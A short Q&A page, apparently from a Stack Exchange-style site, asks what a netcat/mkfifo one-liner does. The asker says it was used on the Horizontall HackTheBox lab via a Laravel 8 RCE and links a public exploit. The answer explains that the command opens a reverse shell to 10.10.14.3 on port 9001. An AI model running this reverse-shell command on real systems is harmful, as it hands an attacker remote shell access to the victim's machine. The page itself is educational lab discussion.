4 
rm /tmp/f
mkfifo /tmp/f
cat/tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 9001 >/tmp/f

It was used on the Horizontall HTB, (laravel 8 RCE).

Here is the exploit:
https://github.com/nth347/CVE-2021-3129_exploit

Improve this question

1 Answer 1

Reset to default
2

It starts a reverse shell that connects to 10.10.14.3 port 9001. The business with /tmp/f is because shell pipelines alone only allow unidirectional communication, but the reverse shell should be bidirectional.

Improve this answer

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .